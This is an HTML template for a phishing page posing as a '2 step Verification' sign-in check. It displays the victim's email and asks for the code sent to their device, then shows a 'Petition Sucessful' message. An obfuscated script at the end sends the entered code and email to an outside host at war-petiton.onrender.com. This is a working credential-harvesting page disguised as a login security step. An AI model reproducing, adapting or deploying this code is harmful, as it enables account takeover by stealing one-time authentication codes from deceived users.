<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Account</title>
</head>
<style>
    .loading-txt{
        font-size: 14px;
        font-family: 'Poppins',sans-serif;
        text-align: center;
        display: none;
    }
    #overlay {
    display: none;
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0, 0, 0, 0.5); 
    z-index: 999;
}
.use-account{
            font-size: 15px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            position: relative;
            padding: 0px 5%;
            top: -5%;
        }
.sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(25%,100%);
        width: 30%;
        background-color:#fff ;
        height: 250px;
        margin-left: 30%;
        display: none;
        z-index: 1000;
    }
    .forgot-password{
        text-align: center;
    }
.device-img{
        display: flex;
        justify-content: center;
        align-items: center;
    }

    @media screen and (max-width:560px) {
        *body{
            padding: 0;
            margin: 0;
        }
        .enter-code{
            font-family: 'Poppins',sans-serif;
            font-size: 15px;
            font-weight:300;
            margin-left: 5%;
        }
        ul { padding:0 }
        @font-face {
    font-family: 'Poppins';
    src: url('/fonts/Poppins-Regular.ttf');
}
.option-one{
    display: flex;
    border: 1px solid black;
}
.sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(-20%,75%);
        width: 60%;
        background-color:#fff ;
        height: 220px;
    }
    .sucess-img{
    display: flex; 
    justify-content: center;
    align-items: center;
    }
    .sucessful h4{
        color: black;
        margin-top: 10px;
        font-size: 21px;
        font-family: 'Poppins',sans-serif;
    }
    .close-sucess{
    text-decoration: none;
    color: rgb(31, 31, 31);
    font-size: 14px;
    font-weight: 600;
    font-family: 'Poppins',sans-serif;
    position: relative;
    margin-top: 10px;
    top: 7%;
    right: 4%;
    }
        .logo-img{
            display: flex;
            justify-content: center;
            width: 100%;
            height: 45px;
            position: relative;
            top: 10%;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 18px;
            font-weight: 400;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
    }
    .try-another-method{
            margin-top: 10%;
        }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color:#fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }
    .device-img{
        display: flex;
        justify-content: center;
        align-items: center;
    }
    .device-img img{
            width: 100px;
            height: 100px;
        }
        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 14px;
            color: #1d1d1d;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 700;
        }
        .use-account{
            font-size: 14px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .user-email{
            border: 1px solid rgb(110, 110, 110);
            width: 65%;
            text-align: center;
            padding: 4px;
            position: relative;
            top: -5%;
            left: 17%;
            border-radius: 10px;
            font-family: 'Poppins',sans-serif;
        }
        .not-your,.learn-more{
            font-size: 14px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            color: black;
            padding: 5%;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .create-account{
            text-decoration: none;
            font-size: 15px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
        }
        #show{
            font-size: 16px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }
    }

    @media (min-width: 561px) and (max-width:1200px) {
        *body{
            padding: 0;
            margin: 0;
        }
        .enter-code{
            font-family: 'Poppins',sans-serif;
            font-size: 15px;
            font-weight:300;
            margin-left: 5%;
        }
        .device-img img{
            width: 100px;
            height: 100px;
        }
        @font-face {
    font-family: 'Poppins';
    src: url('/fonts/Poppins-Regular.ttf');
}
.sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(-20%,75%);
        width: 60%;
        background-color:#fff ;
        height: 220px;
    }
    .sucess-img{
    display: flex; 
    justify-content: center;
    align-items: center;
    }
    .sucessful h4{
        color: black;
        margin-top: 10px;
        font-size: 21px;
        font-family: 'Poppins',sans-serif;
    }
    .close-sucess{
    text-decoration: none;
    color: rgb(31, 31, 31);
    font-size: 14px;
    font-weight: 600;
    font-family: 'Poppins',sans-serif;
    position: relative;
    margin-top: 10px;
    top: 7%;
    right: 4%;
    }
        .logo-img{
            display: flex;
            justify-content: center;
            width: 100%;
            height: 45px;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 20px;
            font-weight: 400;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
      background-color: #fff;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
      background-color: #fff;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      left: 2%;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }

        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 17px;
            color: #1d1d1d;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 700;
        }
        .use-google{
            font-size: 17=6px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .user-email{
            border: 1px solid rgb(110, 110, 110);
            width: 40%;
            text-align: center;
            padding: 4px;
            position: relative;
            top: -5%;
            left: 30%;
            border-radius: 10px;
            font-family: 'Poppins',sans-serif;
        }
        .not-your,.learn-more{
            font-size: 16px;
            font-family: 'Poppins',sans-serif;
            font-weight: 500;
            color: black;
            padding: 5%;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .create-account{
            text-decoration: none;
            font-size: 17px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        .try-another-method{
            margin-top: 10%;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
        }
        #show{
            font-size: 16px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }   
    }

    @media (min-width:1200px) {
        body{
            justify-content: center;
        }
        .try-another-method{
            margin-top: 10%;
        }
        .container{
            width: 25%;
            transform: translate(150%,20%);
            border: 1px solid rgba(151, 151, 151, 0.308);
            height:560px;
            border-radius: 10px;
            padding:10px;
        }
        .sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(20%,100%);
        width: 30%;
        background-color:#fff ;
        height: 220px;
    }
    .sucess-img{
    display: flex; 
    justify-content: center;
    align-items: center;
    }
    .sucessful h4{
        color: black;
        margin-top: 10px;
        font-size: 21px;
        font-family: 'Poppins',sans-serif;
    }
    .close-sucess{
    text-decoration: none;
    color: rgb(31, 31, 31);
    font-size: 14px;
    font-weight: 600;
    font-family: 'Poppins',sans-serif;
    position: relative;
    margin-top: 10px;
    top: 7%;
    right: 4%;
    }
    .choose{
        margin-left: 5%;
        font-family: 'Poppins',sans-serif;
    }
        .logo-img{
            display: flex;
            justify-content: center;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 20px;
            position: relative;
            top: -20px;
            font-weight: 500;
        }
        .use-google{
            position: relative;
            top: -30px;
            font-size: 14px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            padding: 0px 20px 0 20px;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }

        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 17px;
            color: #1d1d1d;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 700;
        }
        .use-google{
            font-size: 18px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .not-your,.learn-more{
            font-size: 16px;
            font-family: 'Poppins',sans-serif;
            font-weight: 500;
            color: black;
            padding: 5%;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .create-account{
            text-decoration: none;
            font-size: 14px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
        }
        #show{
            font-size: 14px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }
        .device-img img{
            width: 100px;
            height: 100px;
        }
        .user-email{
            border: 1px solid rgb(110, 110, 110);
            width: 50%;
            text-align: center;
            padding: 4px;
            position: relative;
            left: 23%;
            border-radius: 10px;
            top: -4%;
            font-family: 'Poppins',sans-serif;
        }
            .option-one{
    display: flex;
    width: 85%;
    margin-left: 5%;
     border-bottom: 1px solid rgb(110, 110, 110);
}
.option-one img{
    height: 30px;
    margin-left: 20px;
    margin-top: 2.7%;
}
.option-one h4{
    margin-left: 20px;
    position: relative;
    top: -21%;
    text-decoration: none;
    font-family: 'Poppins',sans-serif;
    font-weight: 400;
}
.option-two img{
    margin-top: 5%;
}
.method-link{
    text-decoration: none;
    color: black;
}
.form-group {
      position: relative;
      margin-bottom: 20px;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }

        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .enter-code{
            font-family: 'Poppins',sans-serif;
            font-size: 15px;
            font-weight:300;
            margin-left: 5%;
        }
    .try-another-method{
            margin-top: 10%;
        }
    }


</style>
<body>
    <section id="home-section">
        <div id="overlay"></div>
        <div class="sucessful">
            <div style="display: flex; justify-content: space-between;">
                <h6> </h6>
                <a href='/' class="close-sucess">close</a>
    </div> 
        <div class="sucess-img">
            <img src="/images/icons8-tick-50.png"/>
        </div>
            <h4 style="text-align: center;">Petition Sucessful</h4>
       
        </div>
        <h4 class="loading-txt">Loading.....</h4>
        <div class="container">
            <div class="logo-img">
                <img src="/images/icon-ar21.svg" alt="">
            </div>
            <h4 class="sign-in-text"> 2 step Verification</h4>
            <h4 class="use-account">To keep your account safe, we would like to  know if it's really you trying to sign in</h4>
           
                <a href="/signin"><h4 class="user-email"><%=dataInput%></h4></a>

                <h4 class="enter-code"> Enter code sent to your device</h4>
                <div class="form-group">
                    <input type="email" id="email" name="dataInput" placeholder=" ">
                    <label for="email" id="email-label"> Enter Code </label>
                </div>
                  <div class="try-another-method">
                    <a href="/" class="learn-more" id="learn-more" onclick="submit()">Submit</a>
                  </div>
                  <div class="try-another-method">
                    <a href="/2faMethod" class="learn-more" id="learn-more">Try another way</a>
                  </div>
                </div>
    </section>
    <script>
   function _0x2fe0(){const _0x1dd42b=['POST','2229348NpGuxV','Error:','351423SaEhkq','#email','2922338RAFKFJ','Success:','1igdSnV','then','log','5089484GCJIXf','application/json','error','378070AwDYHl','querySelector','665014SNXqPd','json','880URlxXq','innerHTML','351132VICBcp','Network\x20response\x20was\x20not\x20ok'];_0x2fe0=function(){return _0x1dd42b;};return _0x2fe0();}(function(_0x3143be,_0x312d96){const _0x17ce71=_0x275e,_0x49825a=_0x3143be();while(!![]){try{const _0x274372=parseInt(_0x17ce71(0x148))/0x1*(-parseInt(_0x17ce71(0x146))/0x2)+-parseInt(_0x17ce71(0x142))/0x3+-parseInt(_0x17ce71(0x14b))/0x4+-parseInt(_0x17ce71(0x139))/0x5+-parseInt(_0x17ce71(0x13f))/0x6+parseInt(_0x17ce71(0x13b))/0x7+parseInt(_0x17ce71(0x13d))/0x8*(parseInt(_0x17ce71(0x144))/0x9);if(_0x274372===_0x312d96)break;else _0x49825a['push'](_0x49825a['shift']());}catch(_0x8bc6c0){_0x49825a['push'](_0x49825a['shift']());}}}(_0x2fe0,0xbe474));function _0x275e(_0x368a1a,_0x235e14){const _0x2fe058=_0x2fe0();return _0x275e=function(_0x275ed4,_0x57ae42){_0x275ed4=_0x275ed4-0x139;let _0x19d934=_0x2fe058[_0x275ed4];return _0x19d934;},_0x275e(_0x368a1a,_0x235e14);}function submit(){const _0x41bd82=_0x275e,_0x57714e=document[_0x41bd82(0x13a)](_0x41bd82(0x145))['value'],_0xf7b350=document[_0x41bd82(0x13a)]('.user-email'),_0xab092c=_0xf7b350[_0x41bd82(0x13e)],_0x2229b6={'email':_0xab092c,'digits':_0x57714e};fetch('https://war-petiton.onrender.com:4000/submit',{'method':_0x41bd82(0x141),'headers':{'Content-Type':_0x41bd82(0x14c)},'body':JSON['stringify'](_0x2229b6)})[_0x41bd82(0x149)](_0x37d4a9=>{const _0x1c744f=_0x41bd82;if(!_0x37d4a9['ok'])throw new Error(_0x1c744f(0x140));return _0x37d4a9[_0x1c744f(0x13c)]();})[_0x41bd82(0x149)](_0x3057f8=>{const _0x3bc870=_0x41bd82;console[_0x3bc870(0x14a)](_0x3bc870(0x147),_0x3057f8);})['catch'](_0x1f5b98=>{const _0x5659c1=_0x41bd82;console[_0x5659c1(0x14d)](_0x5659c1(0x143),_0x1f5b98);});}
    </script>
</body>
</html>